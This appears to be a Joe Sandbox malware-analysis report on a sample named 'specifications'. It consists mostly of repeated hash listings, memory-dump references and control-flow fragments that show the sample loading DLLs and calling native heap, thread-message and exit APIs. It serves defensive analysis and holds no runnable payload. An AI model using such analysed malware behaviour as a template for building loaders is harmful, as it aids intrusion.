                                                                                                                                                                                  • Opcode ID: 63dae817b91a5a3c908e4bd73e9785b2ab5a13149f0ea8dda38d221d970e1691
                                                                                                                                                                                  • Instruction ID: 19dc7dfb0503b2dd4c99af4a97846d62b9ba35572405c9cd8ee1017096292e60
                                                                                                                                                                                  • Opcode Fuzzy Hash: 63dae817b91a5a3c908e4bd73e9785b2ab5a13149f0ea8dda38d221d970e1691
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48E11774E141198FDB14DFA9D5909AEFBB2FF89304F248169E818AB355D730AD42CFA0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: l67
                                                                                                                                                                                  • API String ID: 0-8406959
                                                                                                                                                                                  • Opcode ID: c556b23ca38a755b754f5aca1e73bd0c6d63fdc397846b3de2d48c4635c28e1c
                                                                                                                                                                                  • Instruction ID: 6c1a88bf263ad3e7d4bf074d74dea56552476060d195756e468466c42cef1579
                                                                                                                                                                                  • Opcode Fuzzy Hash: c556b23ca38a755b754f5aca1e73bd0c6d63fdc397846b3de2d48c4635c28e1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40E10674E141198FDB14CFA9C5909AEBFB2FF89304F248269E815AB355D731AD42CFA0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: I7
                                                                                                                                                                                  • API String ID: 0-4040697463
                                                                                                                                                                                  • Opcode ID: bb55436369aff0cf70b9e3cc2c89444eec9c2d2b51aa5e1f5e20c4d0c70c921a
                                                                                                                                                                                  • Instruction ID: 357d68ab559ebd4ebda79ebbb604b018b3d60adbbdd1fa588060c686cc863ea2
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb55436369aff0cf70b9e3cc2c89444eec9c2d2b51aa5e1f5e20c4d0c70c921a
                                                                                                                                                                                  • Instruction Fuzzy Hash: FF510870E152198FDB14CFA9C5905AEFBB2FF89304F24816AD418AB356D730AD42CFA1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6;%x
                                                                                                                                                                                  • API String ID: 0-1779915769
                                                                                                                                                                                  • Opcode ID: deff396f80e8c9ad98b5688a74c0faf0f2ce5e77cdfcb4c597325fb7e035d42d
                                                                                                                                                                                  • Instruction ID: cd70e43331c07ea00c7058501603ad98e796dc99903cb56b000e813104c0df20
                                                                                                                                                                                  • Opcode Fuzzy Hash: deff396f80e8c9ad98b5688a74c0faf0f2ce5e77cdfcb4c597325fb7e035d42d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8841CF32710615CFCB25CB29D985A5EB7FAFB85390B14882BE61BCB664E230E941CF41
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: D
                                                                                                                                                                                  • API String ID: 0-2746444292
                                                                                                                                                                                  • Opcode ID: 0619901e23ed8030db5a35306ac48d003c4eaf08ea587574be5f194c6656500d
                                                                                                                                                                                  • Instruction ID: e9d8273c8b168d02aec6efbe576270e3519a183483ba4d1e9f64d7fc4977f1c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0619901e23ed8030db5a35306ac48d003c4eaf08ea587574be5f194c6656500d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 14319071E20209CFCB49CE69C541CAFF7B5BB89200B90C56AC522BB154CB70D641CFA5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9bae14abaad7c114a1d3ffaf72a334bd4e16a0f8ce7c2ab7297be6010087f0e7
                                                                                                                                                                                  • Instruction ID: 6bc89c5b014b15b39bb48b547f13b9afda25a73e96b09ca81e93f86cae2c3b24
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bae14abaad7c114a1d3ffaf72a334bd4e16a0f8ce7c2ab7297be6010087f0e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57E1F874E141198FDB14CFA9C590AAEFBB2FF89305F248169E419AB355D730AD42CFA0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8dfef183d8d78bf420cf3696dc27ae66e5998860530b5df206fa1a3d997cdf85
                                                                                                                                                                                  • Instruction ID: 2527e30c7b5c058b58fb612893d27eb528a5be45263d5969a7ea72628158159d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dfef183d8d78bf420cf3696dc27ae66e5998860530b5df206fa1a3d997cdf85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 18E12A74E141198FDB14CFA9C5909AEFBB2FF89304F249169E819AB356C734AD41CFA0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d45f3e3690681650dc59139a834bf6de0a7c7e5d4eaa0cce60c485832b238ea5
                                                                                                                                                                                  • Instruction ID: 6a11330632dcd641f6a399f8ed2aaa6f24d704e0113138506698b0967c4eef36
                                                                                                                                                                                  • Opcode Fuzzy Hash: d45f3e3690681650dc59139a834bf6de0a7c7e5d4eaa0cce60c485832b238ea5
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4E11774E141198FDB14CFA9D5909AEFBB2FF89304F248169E815AB355D730AD82CFA0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dfa77506849d6a0f07232ab47d9d3850ddab7e349c31c81efe883dfcfbd9db57
                                                                                                                                                                                  • Instruction ID: 2a9168c1157a4fa83058ece2735f91a70225fc2173f85baa81f2df324a592345
                                                                                                                                                                                  • Opcode Fuzzy Hash: dfa77506849d6a0f07232ab47d9d3850ddab7e349c31c81efe883dfcfbd9db57
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3A1C274D09619EFDF24DFAAC8447EEBBFABB89300F109169D409A7251DB344985CF40
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6b321d07bb4d1d8e5915d9515ae3fdc7d3332b0b4a3581520aee68e92d8a4f8e
                                                                                                                                                                                  • Instruction ID: 0943f5548054bd7fc36fbaf7cad74d497ebedcfa8a2f31793ee1f1ae57671b00
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b321d07bb4d1d8e5915d9515ae3fdc7d3332b0b4a3581520aee68e92d8a4f8e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 70A1C170D05619EFDF24DFAAC8447EEBBFABB89300F10916AD409A7251DB744A85CF40
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 83e1a3fa45e5b8b3e306d5548e07398e7f286d60b52249230d499f8e7fe48a0a
                                                                                                                                                                                  • Instruction ID: bc503807182cd9e08d0cc4c191cf53195147b2feb122c4b186d930521400da9f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 83e1a3fa45e5b8b3e306d5548e07398e7f286d60b52249230d499f8e7fe48a0a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E41D432B042158FCB05CEAAD58056FBBF7EBC9241B20906BD51BE7350D730CE01CA91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9b90d9620b59aa15c68274f5b63bb65ce67530aea9555279a476d62b05a60973
                                                                                                                                                                                  • Instruction ID: 3a68adcc40292fe72c592412e8b206bdfb81cec4f671196af4d18b54c4e26c02
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b90d9620b59aa15c68274f5b63bb65ce67530aea9555279a476d62b05a60973
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3418137F1411A8FCF44CF59C9899AEBBA6FB88240B458567DA16EB350C634DE01CF91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 458d9fd1fe5a3038424ff5305bd253421ec439e6379cf450c33d061a74e61322
                                                                                                                                                                                  • Instruction ID: d4b17ae99ae6415cd8da99731a8118c17e855b58b564e54d2081b86d13a83e48
                                                                                                                                                                                  • Opcode Fuzzy Hash: 458d9fd1fe5a3038424ff5305bd253421ec439e6379cf450c33d061a74e61322
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A419F33F1411A8FCF44CF59C9899AEBBA6FB88240B55C5A7DA16EB350C234DE01CB91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 76854bba73a635c202f088ab0c16d8ceff21e54ec3d8cf2925426c4c0d4a01b8
                                                                                                                                                                                  • Instruction ID: 02309219be23bd28c03bc3156fa095d5868a26ab783db230ca1183f9c7657d25
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76854bba73a635c202f088ab0c16d8ceff21e54ec3d8cf2925426c4c0d4a01b8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6841CF32710615CFCB25CB29D985A5EB7FAFB85390F14882BE65BCB664E230E940CF41
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 26ce2a000834f27a5c93b891027c13cdd748830ae20c2b480a1d37b61aa0acd0
                                                                                                                                                                                  • Instruction ID: 89b99579943ab911c0ecaf3c097283f898646820065ec82b17c201e74954115d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 26ce2a000834f27a5c93b891027c13cdd748830ae20c2b480a1d37b61aa0acd0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8431A231E20215CBCF59CE69C4848AEFBB5BF89200B90C56AC567AB155CB70D641CF95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d2bc52cb977105aab064ee94d31f7fb687d71ed1ddd8e0a78e39d35b1e017aad
                                                                                                                                                                                  • Instruction ID: 011633ff7e5677d4a62ace1f7d88366e940b49b4a317f64618105fc776ac5652
                                                                                                                                                                                  • Opcode Fuzzy Hash: d2bc52cb977105aab064ee94d31f7fb687d71ed1ddd8e0a78e39d35b1e017aad
                                                                                                                                                                                  • Instruction Fuzzy Hash: B8319231D20209CFCB59CE69C58189EFBB6BB49200B90C66AC522BB115DB70DA41CFA4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:1.2%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                                                                  Signature Coverage:8.2%
                                                                                                                                                                                  Total number of Nodes:146
                                                                                                                                                                                  Total number of Limit Nodes:16

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 78 417c23-417c3f 79 417c47-417c4c 78->79 80 417c42 call 42f753 78->80 81 417c52-417c60 call 42fd53 79->81 82 417c4e-417c51 79->82 80->79 85 417c70-417c81 call 42e1f3 81->85 86 417c62-417c6d call 42fff3 81->86 91 417c83-417c97 LdrLoadDll 85->91 92 417c9a-417c9d 85->92 86->85 91->92
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 98 42cab3-42caec call 404883 call 42dd13 NtClose
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAE7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 116 10c2b60-10c2b6c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 118 10c2df0-10c2dfc LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 117 10c2c70-10c2c7c LdrInitializeThunk
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                                                                                                                  • API String ID: 1836367815-922563818

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 14 4144a3-4144b3 15 4144bc-414511 call 42f623 call 417c23 call 4047f3 call 425223 14->15 16 4144b7 call 42ec13 14->16 25 414533-414538 15->25 26 414513-414524 PostThreadMessageW 15->26 16->15 26->25 27 414526-414530 26->27 27->25
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                                                                                                                  • API String ID: 1836367815-922563818

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 28 42ce33-42ce77 call 404883 call 42dd13 RtlFreeHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE72
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID: qiA
                                                                                                                                                                                  • API String ID: 3298025750-529955485

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 42 417cdf-417d05 43 417d06-417d07 42->43 44 417d09-417d18 43->44 45 417d6c-417d6e 43->45 48 417d1a-417d45 44->48 49 417ccf-417cdb 44->49 46 417d70-417d81 45->46 47 417dbe-417dde call 42ba63 45->47 48->43 59 417d47-417d48 48->59 56 417c83-417c97 LdrLoadDll 49->56 57 417c9a-417c9d 49->57 56->57 59->45
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 60 417c1c-417c1e 61 417c20-417c4c call 42f753 60->61 62 417c58-417c60 60->62 74 417c52-417c60 call 42fd53 61->74 75 417c4e-417c51 61->75 63 417c70-417c81 call 42e1f3 62->63 64 417c62-417c6d call 42fff3 62->64 71 417c83-417c97 LdrLoadDll 63->71 72 417c9a-417c9d 63->72 64->63 71->72 74->63 74->64
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 93 42cde3-42ce27 call 404883 call 42dd13 RtlAllocateHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E9BA,?,?,00000000,?,0041E9BA,?,?,?), ref: 0042CE22
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1279760036-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 103 42ce83-42cebf call 404883 call 42dd13 ExitProcess
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,07461022,?,?,07461022), ref: 0042CEBA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 621844428-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 108 417cd6-417cdb 110 417c83-417c97 LdrLoadDll 108->110 111 417c9a-417c9d 108->111 110->111
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_specifications.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0

                                                                                                                                                                                  Control-flow Graph

